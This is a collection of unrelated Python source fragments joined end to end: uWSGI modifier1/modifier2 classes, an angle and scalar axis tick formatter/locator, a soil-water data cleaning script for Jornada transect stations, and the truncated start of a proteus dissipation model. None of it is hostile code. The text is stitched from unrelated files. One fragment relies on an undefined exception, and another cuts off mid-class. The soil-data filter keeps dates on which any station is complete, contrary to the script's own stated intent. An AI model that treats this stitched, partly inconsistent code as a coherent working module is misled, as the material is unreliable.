# Every legal value of the single-byte modifier2 field: 0..255 inclusive.
RANGE_255 = list(range(256))
class Modifier:
    """Base for uwsgi packet modifiers: a modifier1 ``code`` plus an optional
    modifier2 value (``submod``), validated against ``subcodes``."""

    _submod = None
    subcodes = None  # allowed modifier2 values; None means unvalidated
    code = None  # modifier1 value
    submod = property()

    def __init__(self, submod=None):
        self.submod = submod

    @classmethod
    def _get_code_str(cls, src) -> str:
        """Return ``src`` as a string, or '' when it is None.

        :param src: code value to stringify
        """
        if src is None:
            return ''
        return str(src)

    def __str__(self):
        return self._get_code_str(self.code)

    @submod.getter
    def submod(self) -> str:
        """Modifier 2 value."""
        return self._get_code_str(self._submod)

    @submod.setter
    def submod(self, val):
        allowed = self.subcodes
        unsupported = (
            val is not None
            and allowed is not None
            and val not in allowed
        )
        if unsupported:
            raise ConfigurationError(
                f'Unsupported submod (modifier2) value `{val}` '
                f'for {self.__class__.__name__} (modifier1) `{self.code}`')
        self._submod = val
# --- Concrete modifier1 codes: language/gateway request types -------------
class ModifierWsgi(Modifier):
    """Standard WSGI request followed by the HTTP request body."""
    subcodes = [0]
    code = 0


class ModifierPsgi(Modifier):
    """Standard PSGI request followed by the HTTP request body."""
    subcodes = [0]
    code = 5


class ModifierLua(Modifier):
    """Standard LUA/WSAPI request followed by the HTTP request body."""
    subcodes = [0]
    code = 6


class ModifierRack(Modifier):
    """Standard RACK request followed by the HTTP request body."""
    subcodes = [0]
    code = 7


class ModifierJvm(Modifier):
    """Standard JVM request for The JWSGI interface and
    The Clojure/Ring JVM request handler followed by the HTTP request body.

    """
    SUB_RING = 1
    """Use Clojure/Ring JVM request handler."""

    subcodes = [0, SUB_RING]
    code = 8


class ModifierCgi(Modifier):
    """Standard Running CGI scripts on uWSGI request followed by the HTTP request body."""
    subcodes = [0]
    code = 9
class ModifierManage(Modifier):
    """Management interface request: setup flag specified by ``modifier2``.

    For a list of management flag look at ``ManagementFlag``.

    """
    subcodes = RANGE_255
    code = 10


class ModifierGccgo(Modifier):
    """Gccgo plugin request (modifier1 code 11)."""
    code = 11


class ModifierPhp(Modifier):
    """Standard Running PHP scripts in uWSGI request followed by the HTTP request body."""
    subcodes = [0]
    code = 14


class ModifierMono(Modifier):
    """Standard The Mono ASP.NET plugin request followed by the HTTP request body."""
    subcodes = [0]
    code = 15


class ModifierSpooler(Modifier):
    """The uWSGI Spooler request, the block vars is converted
    to a dictionary/hash/table and passed to the spooler callable.

    """
    subcodes = RANGE_255
    code = 17


class ModifierSymcall(Modifier):
    """Direct call to C-like symbols."""
    subcodes = RANGE_255
    code = 18


class ModifierSsi(Modifier):
    """SSI plugin request (modifier1 code 19)."""
    code = 19


class ModifierEval(Modifier):
    """Raw Code evaluation. The interpreter is chosen by the ``modifier2``.

    ..note:: It does not return a valid uwsgi response, but a raw string (that may be an HTTP response).

    """
    SUB_PYTHON = 0
    SUB_PERL = 5

    subcodes = [SUB_PYTHON, SUB_PERL]
    code = 22


class ModifierXslt(Modifier):
    """Invoke the The XSLT plugin."""
    subcodes = RANGE_255
    code = 23


class ModifierV8(Modifier):
    """Invoke the uWSGI V8 support."""
    subcodes = RANGE_255
    code = 24


class ModifierGridfs(Modifier):
    """Invoke the The GridFS plugin."""
    subcodes = RANGE_255
    code = 25


class ModifierFastfunc(Modifier):
    """Call the FastFuncs specified by the ``modifier2`` field."""
    subcodes = RANGE_255
    code = 26


class ModifierGlusterfs(Modifier):
    """Invoke the The GlusterFS plugin."""
    subcodes = RANGE_255
    code = 27


class ModifierRados(Modifier):
    """Invoke the The RADOS plugin."""
    subcodes = RANGE_255
    code = 28


class ModifierManagePathInfo(Modifier):
    """Standard WSGI request followed by the HTTP request body.

    The ``PATH_INFO`` is automatically modified, removing the ``SCRIPT_NAME`` from it.

    """
    code = 30
class ModifierMessage(Modifier):
    """Generic message passing (reserved)."""
    subcodes = RANGE_255
    code = 31


class ModifierMessageArray(Modifier):
    """Array of char passing (reserved)."""
    subcodes = RANGE_255
    code = 32


class ModifierMessageMarshal(Modifier):
    """Marshalled/serialized object passing (reserved)."""
    subcodes = RANGE_255
    code = 33


class ModifierWebdav(Modifier):
    """WebDAV request (modifier1 code 35)."""
    code = 35


class ModifierSnmp(Modifier):
    """Identify a SNMP request/response (mainly via UDP)."""
    code = 48


class ModifierRaw(Modifier):
    """Corresponds to the ``HTTP`` string and signals that
    this is a raw HTTP response.

    """
    code = 72


class ModifierMulticastAnnounce(Modifier):
    """Announce message."""
    code = 73


class ModifierMulticast(Modifier):
    """Array of chars; a custom multicast message managed by uwsgi."""
    subcodes = [0]
    code = 74


class ModifierClusterNode(Modifier):
    """Add/remove/enable/disable node from a cluster.

    Add action requires a dict of at least 3 keys:

        * hostname
        * address
        * workers

    """
    SUB_ADD = 0
    SUB_REMOVE = 1
    SUB_ENABLE = 2
    SUB_DISABLE = 3

    subcodes = [
        SUB_ADD,
        SUB_REMOVE,
        SUB_ENABLE,
        SUB_DISABLE,
    ]
    code = 95


class ModifierRemoteLogging(Modifier):
    """Remote logging (clustering/multicast/unicast)."""
    subcodes = [0]
    code = 96


class ModifierReload(Modifier):
    """Graceful reload request."""
    SUB_REQUEST = 0
    SUB_CONFIRMATION = 1

    subcodes = [SUB_REQUEST, SUB_CONFIRMATION]
    code = 98


class ModifierReloadBrutal(ModifierReload):
    """Brutal reload request."""
    code = 97


class ModifierConfigFromNode(Modifier):
    """Request configuration data from a uwsgi node (even via multicast)."""
    subcodes = [0, 1]
    code = 99


class ModifierPing(Modifier):
    """PING-PONG. Useful for cluster health check."""
    SUB_PING = 0
    """Request."""

    SUB_PONG = 1
    """Response."""

    subcodes = [SUB_PING, SUB_PONG]
    code = 100


class ModifierEcho(Modifier):
    """ECHO service."""
    subcodes = [0]
    code = 101


class ModifierLegionMsg(Modifier):
    """Legion msg (UDP, the body is encrypted)."""
    subcodes = RANGE_255
    code = 109


class ModifierSignal(Modifier):
    """uwsgi_signal framework (payload is optional).

    .. note:: ``modifier2`` is the signal num.

    """
    subcodes = RANGE_255
    code = 110
class ModifierCache(Modifier):
    """Cache operations."""
    SUB_GET = 0
    """Simple cache get for values not bigger than 64k."""

    SUB_SET = 1
    """Simple cache set for values not bigger than 64k."""

    SUB_DELETE = 2
    """Simple cache del."""

    SUB_DICT_BASED = 3
    """Simple dict based get command."""

    SUB_STREAM = 5
    """Get and stream."""

    SUB_DUMP = 6
    """Dump the whole cache."""

    SUB_MAGIC = 17
    """Magic interface for plugins remote access."""

    subcodes = [
        SUB_GET,
        SUB_SET,
        SUB_DELETE,
        SUB_DICT_BASED,
        SUB_STREAM,
        SUB_DUMP,
        SUB_MAGIC,
    ]
    code = 111


class ModifierCorerouterSignal(Modifier):
    """Special modifier for signaling corerouters about special conditions."""
    code = 123


class ModifierRpc(Modifier):
    """RPC. The packet is an uwsgi array where

        * the first item - the name of the function
        * the following - the args

    """
    SUB_DEFAULT = 0
    """Return uwsgi header + rpc response."""

    SUB_RAW = 1
    """Return raw rpc response, uwsgi header included, if available."""

    SUB_USE_PATH_INFO = 2
    """Split PATH_INFO to get func name and args and return as HTTP response
    with content_type as application/binary or Accept request header (if different from *).

    """

    SUB_XMLRPC = 3
    """Set xmlrpc wrapper (requires libxml2)."""

    SUB_JSONRPC = 4
    """Set jsonrpc wrapper (requires libjansson)."""

    SUB_DICT = 5
    """Used in uwsgi response to signal the response is a uwsgi dictionary
    followed by the body (the dictionary must contains a CONTENT_LENGTH key).

    """

    subcodes = [
        SUB_DEFAULT,
        SUB_RAW,
        SUB_USE_PATH_INFO,
        SUB_XMLRPC,
        SUB_JSONRPC,
        SUB_DICT,
    ]
    code = 173


class ModifierPersistentClose(Modifier):
    """Close mark for persistent connections."""
    subcodes = [0]
    code = 200


class ModifierSubscription(Modifier):
    """Subscription packet. See ``subscriptions``."""
    subcodes = [0]
    code = 224


class ModifierExample(Modifier):
    """Modifier used in dummy example plugin."""
    code = 250


class ModifierResponse(Modifier):
    """Generic response. Request dependent.

    Example: a spooler response set 0 for a failed spool or 1 for a successful one.

    """
    subcodes = RANGE_255
    code = 255
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# This file defines the AngleFormatterLocator class which is a class that
# provides both a method for a formatter and one for a locator, for a given
# label spacing. The advantage of keeping the two connected is that we need to
# make sure that the formatter can correctly represent the spacing requested and
# vice versa. For example, a format of dd:mm cannot work with a tick spacing
# that is not a multiple of one arcminute.
import re
import warnings
import numpy as np
from matplotlib import rcParams
from ... import units as u
from ...units import UnitsError
from ...coordinates import Angle
# Accepted tick-label format strings, e.g. 'dd:mm:ss.s', 'hh:mm', 'd.ddd'.
# NOTE(review): the '.' preceding the repeated precision characters is an
# unescaped regex dot (matches any character) — presumably intended as a
# literal '.'; confirm before tightening.
DMS_RE = re.compile('^dd(:mm(:ss(.(s)+)?)?)?$')
HMS_RE = re.compile('^hh(:mm(:ss(.(s)+)?)?)?$')
DDEC_RE = re.compile('^d(.(d)+)?$')
DMIN_RE = re.compile('^m(.(m)+)?$')
DSEC_RE = re.compile('^s(.(s)+)?$')
SCAL_RE = re.compile('^x(.(x)+)?$')
class BaseFormatterLocator:
    """
    A joint formatter/locator.

    At most one of ``values``, ``number`` or ``spacing`` may be supplied; when
    none is, the locator defaults to aiming for 5 ticks. Setting any one of
    the three (via the properties below) resets the other two to None.
    """

    def __init__(self, values=None, number=None, spacing=None, format=None):
        if (values, number, spacing).count(None) < 2:
            # fix: corrected "specifed" typo in the error message
            raise ValueError("At most one of values/number/spacing can be specified")

        if values is not None:
            self.values = values
        elif number is not None:
            self.number = number
        elif spacing is not None:
            self.spacing = spacing
        else:
            self.number = 5

        self.format = format

    @property
    def values(self):
        """Explicit tick values (Quantity array) or None."""
        return self._values

    @values.setter
    def values(self, values):
        if not isinstance(values, u.Quantity) or (not values.ndim == 1):
            raise TypeError("values should be an astropy.units.Quantity array")
        if not values.unit.is_equivalent(self._unit):
            raise UnitsError("value should be in units compatible with "
                             "coordinate units ({0}) but found {1}".format(self._unit, values.unit))
        # explicit values supersede the other two modes
        self._number = None
        self._spacing = None
        self._values = values

    @property
    def number(self):
        """Requested number of ticks, or None."""
        return self._number

    @number.setter
    def number(self, number):
        self._number = number
        self._spacing = None
        self._values = None

    @property
    def spacing(self):
        """Requested tick spacing, or None."""
        return self._spacing

    @spacing.setter
    def spacing(self, spacing):
        self._number = None
        self._spacing = spacing
        self._values = None

    def minor_locator(self, spacing, frequency, value_min, value_max):
        """Return minor tick positions given the major ``spacing`` and the
        number of minor divisions per major interval (``frequency``)."""
        if self.values is not None:
            # explicit major tick values: no minor ticks
            return [] * self._unit
        minor_spacing = spacing.value / frequency
        values = self._locate_values(value_min, value_max, minor_spacing)
        # Remove candidates that coincide with major ticks.
        # NOTE(review): index[0][0] raises IndexError when no candidate is a
        # multiple of `frequency` — confirm callers guarantee alignment.
        index = np.where((values % frequency) == 0)
        index = index[0][0]
        values = np.delete(values, np.s_[index::frequency])
        return values * minor_spacing * self._unit

    @property
    def format_unit(self):
        """Unit used when rendering tick labels."""
        return self._format_unit

    @format_unit.setter
    def format_unit(self, unit):
        self._format_unit = u.Unit(unit)

    @staticmethod
    def _locate_values(value_min, value_max, spacing):
        """Integer multiples of ``spacing`` falling inside [value_min, value_max]."""
        imin = np.ceil(value_min / spacing)
        imax = np.floor(value_max / spacing)
        values = np.arange(imin, imax + 1, dtype=int)
        return values
class AngleFormatterLocator(BaseFormatterLocator):
    """
    A joint formatter/locator

    Specialisation for angular axes: ticks can be rendered sexagesimally
    (dd:mm:ss / hh:mm:ss) or decimally in the chosen format unit.
    """

    def __init__(self, values=None, number=None, spacing=None, format=None,
                 unit=None, decimal=None, format_unit=None):

        if unit is None:
            unit = u.degree

        if format_unit is None:
            format_unit = unit

        # Non degree/hour display units can only be rendered decimally;
        # requesting sexagesimal for them is an error.
        if format_unit not in (u.degree, u.hourangle, u.hour):
            if decimal is None:
                decimal = True
            elif decimal is False:
                raise UnitsError("Units should be degrees or hours when using non-decimal (sexagesimal) mode")
        elif decimal is None:
            # degrees/hours default to sexagesimal display
            decimal = False

        self._unit = unit
        # `or unit` is defensive only — format_unit was already defaulted above
        self._format_unit = format_unit or unit
        self._decimal = decimal
        self._sep = None
        super().__init__(values=values, number=number, spacing=spacing,
                         format=format)
    @property
    def spacing(self):
        """Tick spacing as an angular Quantity, or None."""
        return self._spacing

    @spacing.setter
    def spacing(self, spacing):
        # Tighter validation than the base class: spacing must be angular.
        if spacing is not None and (not isinstance(spacing, u.Quantity) or
                                    spacing.unit.physical_type != 'angle'):
            raise TypeError("spacing should be an astropy.units.Quantity "
                            "instance with units of angle")
        # setting spacing invalidates the number/values modes
        self._number = None
        self._spacing = spacing
        self._values = None
    @property
    def sep(self):
        """Separator characters used between sexagesimal fields, or None."""
        return self._sep

    @sep.setter
    def sep(self, separator):
        self._sep = separator
    @property
    def format(self):
        """The tick label format string (e.g. 'dd:mm:ss.s'), or None."""
        return self._format

    @format.setter
    def format(self, value):
        # Parse the format string and derive decimal/sexagesimal mode, the
        # display unit, the number of sexagesimal fields and the precision.
        self._format = value

        if value is None:
            return

        if DMS_RE.match(value) is not None:
            # sexagesimal degrees, e.g. 'dd:mm:ss.ss'
            self._decimal = False
            self._format_unit = u.degree
            if '.' in value:
                self._precision = len(value) - value.index('.') - 1
                self._fields = 3
            else:
                self._precision = 0
                self._fields = value.count(':') + 1
        elif HMS_RE.match(value) is not None:
            # sexagesimal hours, e.g. 'hh:mm:ss.ss'
            self._decimal = False
            self._format_unit = u.hourangle
            if '.' in value:
                self._precision = len(value) - value.index('.') - 1
                self._fields = 3
            else:
                self._precision = 0
                self._fields = value.count(':') + 1
        elif DDEC_RE.match(value) is not None:
            # decimal degrees, e.g. 'd.ddd'
            self._decimal = True
            self._format_unit = u.degree
            self._fields = 1
            if '.' in value:
                self._precision = len(value) - value.index('.') - 1
            else:
                self._precision = 0
        elif DMIN_RE.match(value) is not None:
            # decimal arcminutes, e.g. 'm.mmm'
            self._decimal = True
            self._format_unit = u.arcmin
            self._fields = 1
            if '.' in value:
                self._precision = len(value) - value.index('.') - 1
            else:
                self._precision = 0
        elif DSEC_RE.match(value) is not None:
            # decimal arcseconds, e.g. 's.sss'
            self._decimal = True
            self._format_unit = u.arcsec
            self._fields = 1
            if '.' in value:
                self._precision = len(value) - value.index('.') - 1
            else:
                self._precision = 0
        else:
            raise ValueError("Invalid format: {0}".format(value))

        # A previously set spacing must remain representable in this format.
        if self.spacing is not None and self.spacing < self.base_spacing:
            warnings.warn("Spacing is too small - resetting spacing to match format")
            self.spacing = self.base_spacing

        if self.spacing is not None:
            ratio = (self.spacing / self.base_spacing).decompose().value
            remainder = ratio - np.round(ratio)
            if abs(remainder) > 1.e-10:
                warnings.warn("Spacing is not a multiple of base spacing - resetting spacing to match format")
                self.spacing = self.base_spacing * max(1, round(ratio))
    @property
    def base_spacing(self):
        # Smallest tick spacing representable by the current format: one
        # unit of the least-significant field or decimal place.
        if self._decimal:
            spacing = self._format_unit / (10. ** self._precision)
        else:
            if self._fields == 1:
                spacing = 1. * u.degree
            elif self._fields == 2:
                spacing = 1. * u.arcmin
            elif self._fields == 3:
                if self._precision == 0:
                    spacing = 1. * u.arcsec
                else:
                    spacing = u.arcsec / (10. ** self._precision)
            if self._format_unit is u.hourangle:
                # Hour-angle fields are 15x their degree counterparts
                # (1 hour == 15 degrees).
                spacing *= 15
        return spacing
    def locator(self, value_min, value_max):
        """Return ``(tick_values, spacing)``, both as Quantities in
        ``self._unit``, for the interval [value_min, value_max].
        """
        if self.values is not None:
            # values were manually specified
            return self.values, 1.1 * u.arcsec
        else:
            # In the special case where value_min is the same as value_max, we
            # don't locate any ticks. This can occur for example when taking a
            # slice for a cube (along the dimension sliced).
            if value_min == value_max:
                return [] * self._unit, 0 * self._unit
            # NOTE(review): assumes either self.spacing or self.number is
            # set; if both are None, spacing_value below is unbound.
            if self.spacing is not None:
                # spacing was manually specified
                spacing_value = self.spacing.to_value(self._unit)
            elif self.number is not None:
                # number of ticks was specified, work out optimal spacing
                # first compute the exact spacing
                dv = abs(float(value_max - value_min)) / self.number * self._unit
                if self.format is not None and dv < self.base_spacing:
                    # if the spacing is less than the minimum spacing allowed by the format, simply
                    # use the format precision instead.
                    spacing_value = self.base_spacing.to_value(self._unit)
                else:
                    # otherwise we clip to the nearest 'sensible' spacing
                    if self._decimal:
                        from .utils import select_step_scalar
                        spacing_value = select_step_scalar(dv.to_value(self._format_unit)) * self._format_unit.to(self._unit)
                    else:
                        if self._format_unit is u.degree:
                            from .utils import select_step_degree
                            spacing_value = select_step_degree(dv).to_value(self._unit)
                        else:
                            from .utils import select_step_hour
                            spacing_value = select_step_hour(dv).to_value(self._unit)
            # We now find the interval values as multiples of the spacing and
            # generate the tick positions from this.
            values = self._locate_values(value_min, value_max, spacing_value)
            return values * spacing_value * self._unit, spacing_value * self._unit
    def formatter(self, values, spacing, format='auto'):
        """Format tick *values* (an angle Quantity array) as strings.

        *spacing* determines how many fields/decimals are shown when no
        explicit format was set; *format* selects plain/LaTeX output.
        Returns a list of strings ([] for empty input).
        """
        if not isinstance(values, u.Quantity) and values is not None:
            raise TypeError("values should be a Quantities array")
        if len(values) > 0:
            decimal = self._decimal
            unit = self._format_unit
            if self.format is None:
                if decimal:
                    # Here we assume the spacing can be arbitrary, so for example
                    # 1.000223 degrees, in which case we don't want to have a
                    # format that rounds to degrees. So we find the number of
                    # decimal places we get from representing the spacing as a
                    # string in the desired units. The easiest way to find
                    # the smallest number of decimal places required is to
                    # format the number as a decimal float and strip any zeros
                    # from the end. We do this rather than just trusting e.g.
                    # str() because str(15.) == 15.0. We format using 10 decimal
                    # places by default before stripping the zeros since this
                    # corresponds to a resolution of less than a microarcecond,
                    # which should be sufficient.
                    spacing = spacing.to_value(unit)
                    fields = 0
                    precision = len("{0:.10f}".format(spacing).replace('0', ' ').strip().split('.', 1)[1])
                else:
                    # Express the spacing in the seconds-level unit
                    # (1/3600 of the format unit) to choose field count.
                    spacing = spacing.to_value(unit / 3600)
                    if spacing >= 3600:
                        fields = 1
                        precision = 0
                    elif spacing >= 60:
                        fields = 2
                        precision = 0
                    elif spacing >= 1:
                        fields = 3
                        precision = 0
                    else:
                        fields = 3
                        precision = -int(np.floor(np.log10(spacing)))
            else:
                # Explicit format: precision/fields were parsed by the
                # format setter.
                fields = self._fields
                precision = self._precision
            if decimal:
                sep = None
                fmt = None
            elif self._sep is not None:
                sep = self._sep
                fmt = None
            else:
                sep = 'fromunit'
                if unit == u.degree:
                    if format == 'latex' or (format == 'auto' and rcParams['text.usetex']):
                        fmt = 'latex'
                    else:
                        sep = ('\xb0', "'", '"')
                        fmt = None
                else:
                    if format == 'ascii':
                        fmt = None
                    elif format == 'latex' or (format == 'auto' and rcParams['text.usetex']):
                        fmt = 'latex'
                    else:
                        # Here we still use LaTeX but this is for Matplotlib's
                        # LaTeX engine - we can't use fmt='latex' as this
                        # doesn't produce LaTeX output that respects the fonts.
                        sep = (r'$\mathregular{^h}$', r'$\mathregular{^m}$', r'$\mathregular{^s}$')
                        fmt = None
            angles = Angle(values)
            string = angles.to_string(unit=unit,
                                      precision=precision,
                                      decimal=decimal,
                                      fields=fields,
                                      sep=sep,
                                      format=fmt).tolist()
            return string
        else:
            return []
class ScalarFormatterLocator(BaseFormatterLocator):
    """
    A joint formatter/locator for scalar (non-angle) coordinate values.
    """
    def __init__(self, values=None, number=None, spacing=None, format=None,
                 unit=None, format_unit=None):
        # The working unit comes from the first of (unit, spacing, values)
        # that is provided; format_unit falls back to the same unit.
        if unit is not None:
            self._unit = unit
            self._format_unit = format_unit or unit
        elif spacing is not None:
            self._unit = spacing.unit
            self._format_unit = format_unit or spacing.unit
        elif values is not None:
            self._unit = values.unit
            self._format_unit = format_unit or values.unit
        super().__init__(values=values, number=number, spacing=spacing,
                         format=format)
    @property
    def spacing(self):
        # Manually-specified tick spacing (a Quantity), or None.
        return self._spacing
    @spacing.setter
    def spacing(self, spacing):
        if spacing is not None and not isinstance(spacing, u.Quantity):
            raise TypeError("spacing should be an astropy.units.Quantity instance")
        # Setting an explicit spacing clears any number/values setting.
        self._number = None
        self._spacing = spacing
        self._values = None
    @property
    def format(self):
        """Format string: a fixed-decimal pattern (SCAL_RE) or '%'-style."""
        return self._format
    @format.setter
    def format(self, value):
        self._format = value
        if value is None:
            return
        if SCAL_RE.match(value) is not None:
            # Fixed-decimal pattern: precision = digits after the '.'.
            if '.' in value:
                self._precision = len(value) - value.index('.') - 1
            else:
                self._precision = 0
            if self.spacing is not None and self.spacing < self.base_spacing:
                warnings.warn("Spacing is too small - resetting spacing to match format")
                self.spacing = self.base_spacing
            if self.spacing is not None:
                # Snap a manually-set spacing to a multiple of the base
                # spacing implied by the format precision.
                ratio = (self.spacing / self.base_spacing).decompose().value
                remainder = ratio - np.round(ratio)
                if abs(remainder) > 1.e-10:
                    warnings.warn("Spacing is not a multiple of base spacing - resetting spacing to match format")
                    self.spacing = self.base_spacing * max(1, round(ratio))
        elif not value.startswith('%'):
            raise ValueError("Invalid format: {0}".format(value))
    @property
    def base_spacing(self):
        # Smallest spacing representable at the current format precision.
        return self._format_unit / (10. ** self._precision)
    def locator(self, value_min, value_max):
        """Return ``(tick_values, spacing)`` Quantities in ``self._unit``."""
        if self.values is not None:
            # values were manually specified
            return self.values, 1.1 * self._unit
        else:
            # In the special case where value_min is the same as value_max, we
            # don't locate any ticks. This can occur for example when taking a
            # slice for a cube (along the dimension sliced).
            if value_min == value_max:
                return [] * self._unit, 0 * self._unit
            # NOTE(review): assumes either self.spacing or self.number is
            # set; otherwise `spacing` below is unbound.
            if self.spacing is not None:
                # spacing was manually specified
                spacing = self.spacing.to_value(self._unit)
            elif self.number is not None:
                # number of ticks was specified, work out optimal spacing
                # first compute the exact spacing
                dv = abs(float(value_max - value_min)) / self.number * self._unit
                if self.format is not None and (not self.format.startswith('%')) and dv < self.base_spacing:
                    # if the spacing is less than the minimum spacing allowed by the format, simply
                    # use the format precision instead.
                    spacing = self.base_spacing.to_value(self._unit)
                else:
                    from .utils import select_step_scalar
                    spacing = select_step_scalar(dv.to_value(self._format_unit)) * self._format_unit.to(self._unit)
            # We now find the interval values as multiples of the spacing and
            # generate the tick positions from this
            values = self._locate_values(value_min, value_max, spacing)
            return values * spacing * self._unit, spacing * self._unit
    def formatter(self, values, spacing, format='auto'):
        """Format tick *values* as fixed-decimal (or '%'-style) strings."""
        if len(values) > 0:
            if self.format is None:
                # Derive the precision from the spacing magnitude.
                if spacing.value < 1.:
                    precision = -int(np.floor(np.log10(spacing.value)))
                else:
                    precision = 0
            elif self.format.startswith('%'):
                # printf-style format applied to the raw values.
                return [(self.format % x.value) for x in values]
            else:
                precision = self._precision
            return [("{0:." + str(precision) + "f}").format(x.to_value(self._format_unit)) for x in values]
        else:
            return []
| |
# ===============================================================================
# Copyright 2016 gabe-parrish
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= standard library imports ========================
import os
import os
import pandas as pd
import numpy as np
import datetime
from matplotlib import pyplot as plt
# ============= local library imports ===========================
def intersect(l1, l2):
    """Return the elements common to both sets *l1* and *l2*."""
    return l1 & l2
def formatter(df_dict):
    """
    Reduce each pixel's station records to the dates with complete data.

    For every pixel key, collect the date and soil-water-content columns
    from each station dataframe, find the dates on which at least one
    station has no missing reading (the source csv marks missing values
    with "."), restrict those dates to the ones present in the first
    station's record, then keep only the rows falling on those dates.

    :param df_dict: a dict of lists of data frames with the keys from
        '000' to '012', 13 keys total; each dataframe has 'date' and
        'swc_30cm'/'swc_60cm'/'swc_90cm'/'swc_110cm'/'swc_130cm' columns.
    :return: dict mapping each pixel key to a list of
        (dates, swc_30, swc_60, swc_90, swc_110, swc_130) tuples, one
        tuple per station dataframe, filtered to the good dates.
    """
    pix_dictionary = {}
    for key, frames in df_dict.items():
        print("key \n {}".format(key))
        # Pull out (date, 30cm, 60cm, 90cm, 110cm, 130cm) per station.
        values = []
        for df in frames:
            values.append((df['date'], df['swc_30cm'], df['swc_60cm'],
                           df['swc_90cm'], df['swc_110cm'], df['swc_130cm']))
        # A date is "good" when some station has all five depths present
        # ("." is the missing-data marker in the source csv).
        good_dates = set()
        for station in values:
            for date, a, b, c, d, e in zip(*station):
                if "." not in (a, b, c, d, e):
                    good_dates.add(date)
        # Only keep dates that actually occur in the first station's record.
        good_dates &= set(values[0][0])
        print("good dates {} pixel {}, length {}".format(good_dates, key, len(good_dates)))
        # Filter every station's columns down to the good dates.
        good_vals = []
        for station in values:
            g_dates, g_a, g_b, g_c, g_d, g_e = [], [], [], [], [], []
            for date, a, b, c, d, e in zip(*station):
                if date in good_dates:
                    g_dates.append(date)
                    g_a.append(a)
                    g_b.append(b)
                    g_c.append(c)
                    g_d.append(d)
                    g_e.append(e)
            good_vals.append((g_dates, g_a, g_b, g_c, g_d, g_e))
        pix_dictionary[key] = good_vals
    return pix_dictionary
def parse_data(path="/Users/Gabe/Desktop/33_37_ETRM_aoi_project/Jornada_012002_transect_soil_water_content_data/"
                    "Jornada_012002_transect_soil_water_content_data.csv",
               header=72):
    """Read the Jornada transect csv and group station records by pixel.

    Splits the csv into per-station dataframes using the 'location'
    column, groups them into ETRM pixels via a hard-coded station->pixel
    map, and hands the grouping to :func:`formatter`.

    :param path: csv file to read (defaults to the original 2015 export).
    :param header: row index of the csv header (72 for the original file,
        which carries a long preamble).
    :return: whatever :func:`formatter` returns for the grouped data.
    """
    # ====== Jornada =======
    df = pd.read_csv(path, header=header)
    # Station (location code) -> ETRM pixel membership.
    relate_dict = {"000": ["C01", "C02"], "001": ["C03", "C04", "C05", "C06", "C07", "C08", "C09"],
                   "002": ["C10", "C11"],
                   "003": ["C12", "C13", "C14", "C15", "C16", "C17", "C18", "C19", "C20", "C21"],
                   "004": ["C22", "C23", "C24", "C25", "C26", "C27", "C28", "C29"],
                   "005": ["C31", "C32", "C33", "C34", "C35", "C36", "C37", "C38", "C39"],
                   "006": ["C40", "C41", "C42", "C43", "C44", "C45", "C46", "C47", "C48"],
                   "007": ["C51", "C52", "C53", "C54", "C55", "C56", "C57"],
                   "008": ["C58", "C59", "C60", "C61", "C62", "C63", "C64", "C65", "C66"],
                   "009": ["C67", "C68", "C69", "C70"], "010": ["C71", "C72", "C73", "C74", "C75"],
                   "011": ["C76", "C77", "C78", "C79", "C80", "C81", "C82", "C83", "C84"],
                   "012": ["C85", "C86", "C87", "C88", "C89"]}
    df_dict = {}
    for key, locations in relate_dict.items():
        # One dataframe per station, in the pixel's station order.
        df_dict[key] = [df[df['location'] == loc] for loc in locations]
    print("another look {}".format(df_dict['000']))
    pix_dictionary = formatter(df_dict)
    return pix_dictionary
if __name__ == "__main__":
    # Entry point: clean the Jornada transect data of dates with missing
    # soil-water-content readings before any statistics are computed.
    # Before we find the standard error, we need to parse through the original file and remove any missing entries such
    # that if data are missing for one location in the Jornada we throw out the missing data and all corresponding data
    # in the time series.
    parse_data()
    # # this outputs a csv of the running avg(depth_average) and standard error of the mean for each pixel.
    # find_std_error()
    #
    # # process the missing data out of the df dicts
    # p_000 = pd.merge(df_dict['000'][0], df_dict['000'][1], on='date')
    #
    # print "p000", p_000
    #
    # p_000 = p_000[p_000.swc_30cm != "."]
    # p_000 = p_000[p_000.swc_60cm != "."]
    # p_000 = p_000[p_000.swc_90cm != "."]
    # p_000 = p_000[p_000.swc_110cm != "."]
    # p_000 = p_000[p_000.swc_130cm != "."]
    #
    # print "editt"
| |
from __future__ import division
from builtins import range
from past.utils import old_div
import proteus
from proteus.mprans.cDissipation import *
from proteus.mprans.cDissipation2D import *
import numpy as np
from proteus import Profiling as prof
from proteus import cfemIntegrals
from . import cArgumentsDict
"""
NOTES:
Hardwired Numerics include:
lagging all terms from Navier-Stokes, Kappa equations
same solution space for velocity from Navier-Stokes and Dissipation
equations
This can be removed by saving gradient calculations in N-S and lagging
rather than passing degrees of freedom between models
"""
class SubgridError(proteus.SubgridError.SGE_base):
    """No-op subgrid error estimator for the dissipation equation.

    All hooks are empty; the base class is initialized with lag=False.
    """
    def __init__(self, coefficients, nd):
        proteus.SubgridError.SGE_base.__init__(self, coefficients, nd, lag=False)
    def initializeElementQuadrature(self, mesh, t, cq):
        # No subgrid error terms are computed for this model.
        pass
    def updateSubgridErrorHistory(self, initializationPhase=False):
        pass
    def calculateSubgridError(self, q):
        pass
class ShockCapturing(proteus.ShockCapturing.ShockCapturing_base):
    """Shock capturing (numerical diffusion) for the dissipation equation.

    Lagging of the numerical diffusion can be delayed by ``nStepsToDelay``
    steps; lagging is always disabled on the very first step because no
    history exists yet.
    """
    def __init__(self, coefficients, nd, shockCapturingFactor=0.25, lag=True, nStepsToDelay=None):
        proteus.ShockCapturing.ShockCapturing_base.__init__(self, coefficients, nd, shockCapturingFactor, lag)
        self.nStepsToDelay = nStepsToDelay
        self.nSteps = 0
        if self.lag:
            # First step can never be lagged: switch lagging off and delay
            # it by one step instead.
            # (Fixed: the log message previously said "Kappa.ShockCapturing",
            # a copy-paste from the kappa model.)
            prof.logEvent("Dissipation.ShockCapturing: lagging requested but must lag the first step; switching lagging off and delaying")
            self.nStepsToDelay = 1
            self.lag = False
    def initializeElementQuadrature(self, mesh, t, cq):
        # Point both current and lagged diffusion at the quadrature arrays.
        self.mesh = mesh
        self.numDiff = []
        self.numDiff_last = []
